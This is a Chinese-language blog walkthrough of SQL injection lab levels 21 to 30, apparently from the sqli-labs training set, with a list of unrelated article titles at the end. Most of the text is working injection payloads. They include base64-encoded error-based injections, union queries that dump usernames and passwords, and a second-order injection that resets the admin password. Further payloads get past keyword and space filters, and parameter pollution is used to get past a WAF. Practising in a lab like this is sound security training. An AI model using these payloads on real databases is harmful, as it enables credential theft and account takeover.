第二十一关

第二十一关我们正常登陆后看到,uname后面变成了一堆字母



这是经过base64编码之后的样子,所以就照葫芦画瓢,将我payload的uname后面的部分转码成base64,这里可以用正常的注入套路order by等一步步走,但为了方便我直接用报错注入,但这里注意闭合是')

uname=admin') and updatexml(1,concat(0x7e,(select database())),0) #

将uname=后面的部分都base64编码一下

uname=YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSksMCkgIw==



爆内容:

uname=YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBwYXNzd29yZCBmcm9tIHVzZXJzIGxpbWl0IDAsMSkpLDApIw==

第二十二关

这关正常登陆和上关回显一样盲猜就是换了个闭合符号,测试下还真是闭合换成了"双引号

爆内容:

uname=YWRtaW4iICBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBwYXNzd29yZCBmcm9tIHVzZXJzIGxpbWl0IDAsMSkpLDApIw==

第二十三关

这关测试一下好像怎么换注释符都没作用,那就换一种注释方式,加两个引号将前后的引号闭合掉。

?id=-1'  union select 11,2,database()  '

或者用or语句闭合掉后面的引号

?id='  union select 1,group_concat(password),group_concat(username) from users where 11 or  '1'='1

第二十四关

这里是个二次注入,原本正常的数据在被调用时,其中的某些字符被当成sql语句执行了。

这里先注册一个admin' #用户,登陆。在修改密码的时候sql语句是这样的,用户名和密码被直接拿出来使用,没有转义。



所以当我们修改密码时Sql语句变为

UPDATE users SET passwd="New_Pass" WHERE username =' admin' # ' AND password='

也就是执行了UPDATE users SET passwd="New_Pass" WHERE username =' admin'

等于说变成修改了admin的密码,这里我将密码改为1234,看修改后能不能登陆admin账户,修改成功后会有succe提示



登陆admin



成功

第二十五关

这关看题目应该把and和or过滤了,但是只要双写就绕过了,因为他只过滤一次。或者直接用union select联合查询。

也可以用 &&和||代替and和or

http://192.168.0.101/sql/less-25/?id=1' anandd '1'='1' --+
-1'  union select 1,2,group_concat(passwoorrd) from users --+

第二十五a关

这关一样的,就是变成数字型注入,

-1'  union select 1,2,group_concat(passwoorrd) from users --+

第二十六关

这关过滤了很多



空格,and,or,\,/*,#等都被过滤了.所以我们直接给他加个url编码

但是这里能用的空格编码%a0在windows上不能解析,懒得在Linux上搭环境了,就不截图了。



%09 TAB键(水平)

%0a 新建一行

%0c 新的一页

%0d return功能

%0b TAB键(垂直)

%a0 空格

%27单引号

用'1'='1进行闭合或者‘闭合,(注意在hackbar中输入&&时,需要自行URL编码为%26%26,否则会报错,而输入||不需要)

爆库名:

?id=0'union%a0select%a01,database(),3%26%26'1'='1

爆内容:

?id=0'union%a0select%a01,group_concat(passwoorrd)%a0from%a0users%a0where%a01,3%26%26'1'='1

第二十六a关

这关闭合多了个)

爆内容:

id=0')%0bunion%0bselect%0b1,group_concat(username,0x3b,passwoorrd),3%0bfrom%0busers%0bwhere%0b('1')=('1

第二十七关

这关把 union select一起过滤了,用大小写UniON SelECt绕过就行

爆内容:

?id=0'%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0'1

第二十七a关

和第二十七关一样,就是把单引号变成双引号闭合了

第二十八关

这关过滤了组合union select双写union union select select就行,其他还是替换url编码。

这关and没过滤

爆数据库名:

?id=1'and(ascii(substr((sElect%a0database()),1,1))>115)and'1'='1

第二十八a关

这关闭合变成了')其他一样。

第二十九关

这关开始没整明白他干了啥,我输入啥都行,看hint就把我的‘单引号url编码了,

直接爆数据。

?id=-1' union select 1,2,group_concat(username,0x7e,password) from users --+



但看题目好像用了waf百度下又看了源码。



好像是输入两个id值,waf看前面的id值过关了,apache就解析后面的

变这样

?id=1&id=0' union select 1,group_concat(password),2 from users --+

第三十关

把单引号换成双引号就行了,可能是专门设置这样的关卡来提醒我们,过waf时要多尝试不同的可能.........

最新文章

  1. TP5验证规则
  2. Sublime中增加格式化代码的快捷键
  3. (转)RabbitMQ消息队列的小伙伴: ProtoBuf(Google Protocol Buffer)
  4. Android Studio的一些技巧和使用注意事项(持续更新)
  5. tomcat环境变量的配置(网上摘,全部验证通过)
  6. Drupal设置首页默认内容
  7. Spring Boot 系列教程18-itext导出pdf下载
  8. css3中的动画效果
  9. debian9.6修改系统语言
  10. vue添加页面键盘事件
  11. MySQL 分支的选择:Percona 还是 MariaDB
  12. 关于elment-ui树形控件Tree的使用
  13. C# 中使用Linq和Lambda表达式对List<T>进行排序
  14. [maven] settings 文件 本地maven仓库
  15. mysql官方下载
  16. DevExpress v18.1新版亮点——WinForms篇(一)
  17. python log封装
  18. Vs2010创建WebService
  19. AngularJs学习笔记--Modules
  20. HTTP Cache怎样计算Age

热门文章

  1. 第三周java实验报告
  2. Asp.Net Core 学习教程2、使用ASP.NET Core中的RazorPages
  3. IOS(苹果手机)使用video播放HLS流,实现在内部播放及全屏播放(即非全屏和全屏播放)。
  4. 北邮OJ-257- 最近公共祖先-软件14 java
  5. 深入浅出C#结构体
  6. 利用Python获取文件类型
  7. 如何实现浏览器的Console功能
  8. coding++:Spring中的@Transactional(rollbackFor = Exception.class)属性详解
  9. 【WPF学习】第六十一章 组织模板资源
  10. MATLAB 一维随机变量及其概率分布